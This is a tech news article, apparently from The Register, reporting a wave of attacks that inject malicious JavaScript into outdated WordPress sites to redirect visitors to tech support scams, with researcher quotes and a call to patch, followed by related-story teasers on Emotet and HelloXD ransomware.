Couldn't give a fsck about patching? Well, that's your WordPress website pwned, then

Fiends use vulns to lure victims into tech support scams

Website admins are urged to update their WordPress installations as soon as possible to the latest version following a rash of attacks exploiting known vulnerabilities in the web publishing software.

Researchers at Malwarebytes say miscreants don't appear to be targeting any one specific bug, but rather a full array of flaws in older versions of WordPress and its various plugins.

"During the past few days, our crawlers have been catching a larger-than-usual number of WordPress sites being hijacked," noted MalwareBytes researcher Jérôme Segura on Thursday.

"One of the most visible client-side payloads we see are redirections to tech support scam pages. Digging deeper, we found that this is part of a series of attacks that have compromised thousands of WordPress sites since early September."

According to Segura and researchers with Sucuri, the hackers have been exploiting flaws that allow them to inject malicious JavaScript code into pages, usually either inside an HTML header on a page or within the wp_posts table in the WordPress database.

From there, the nasty code loads when the WordPress site is accessed and redirects users to scam pages – most notably fake tech support sites and hard-to-remove "evil cursor" scareware screens.


So phar, so FUD: PHP flaw puts WordPress sites at risk of hacks


Admins are being advised to check their pages for signs of the injected JavaScript and, if possible, figure out where the attack came from.

"Website owners affected by these attacks will have to perform a thorough cleanup of injected pages, databases, and backdoors," Segura explained.

"More importantly, they will need to identify the root cause of the compromise, which often times is an outdated WordPress installation or plugin."

WordPress is no stranger to large-scale attacks on its platform. The widely-used CMS is an attractive target for cybercriminals as its vulnerabilities most often provide an attacker with a way to covertly compromise sites and inject code for further attacks.

Earlier this year, fellow CMS vendor Drupal took its turn in the shooting barrel as attackers seized on a bug known as 'Drupalgeddon' to inject things like cryptocoin mining scripts into pages. ®

Similar topics

Broader topics

Other stories you might like

  • Emotet malware gang re-emerges with Chrome-based credit card heistware
    Crimeware groups are re-inventing themselves

    The criminals behind the Emotet botnet – which rose to fame as a banking trojan before evolving into spamming and malware delivery – are now using it to target credit card information stored in the Chrome web browser.

    Once the data – including the user's name, the card's numbers and expiration information – is exfiltrated, the malware will send it to command-and-control (C2) servers that are different than the one that the card stealer module uses, according to researchers with cybersecurity vendor Proofpoint's Threat Insight team.

    The new card information module is the latest illustration of Emotet's Lazarus-like return. It's been more than a year since Europol and law enforcement from countries including the United States, the UK and Ukraine tore down the Emotet actors' infrastructure in January 2021 and – they hoped – put the malware threat to rest.

    Continue reading
  • HelloXD ransomware bulked up with better encryption, nastier payload
    Russian-based group doubles the extortion by exfiltrating the corporate data before encrypting it.

    Windows and Linux systems are coming under attack by new variants of the HelloXD ransomware that includes stronger encryption, improved obfuscation and an additional payload that enables threat groups to modify compromised systems, exfiltrate files and execute commands.

    The new capabilities make the ransomware, first detected in November 2021 - and the developer behind it even more dangerous - according to researchers with Palo Alto Networks' Unit 42 threat intelligence group. Unit 42 said the HelloXD ransomware family is in its initial stages but it's working to track down the author.

    "While the ransomware functionality is nothing new, during our research, following the lines, we found out the ransomware is most likely developed by a threat actor named x4k," the researchers wrote in a blog post.

    Continue reading
  • TypeScript joins 5 most used languages in 2022 lineup
    Stackoverflow survey: JavaScript still in lead. Plus, you may hate COBOL, but users saw a salary jump

    The annual Stackoverflow survey is here and while JavaScript continues to rule the roost, TypeScript has edged past Java to make it into the top five most commonly used programming languages.

    Microsoft's superset of JavaScript has been slowly creeping up the rankings: it was seventh most used in 2021, up from ninth place in 2020, and languished in 12th in 2018. In the latest study it was fifth.

    Interestingly, despite TypeScript's popularity in the usage stakes, affection for the technology dropped. Rust continued its run as the most loved language (87 percent of developers wanted to continue using it) but TypeScript slipped from third to fourth in the fondness stakes as Elixir leapt into second place from fourth in 2021.

    Continue reading

Biting the hand that feeds IT © 1998–2022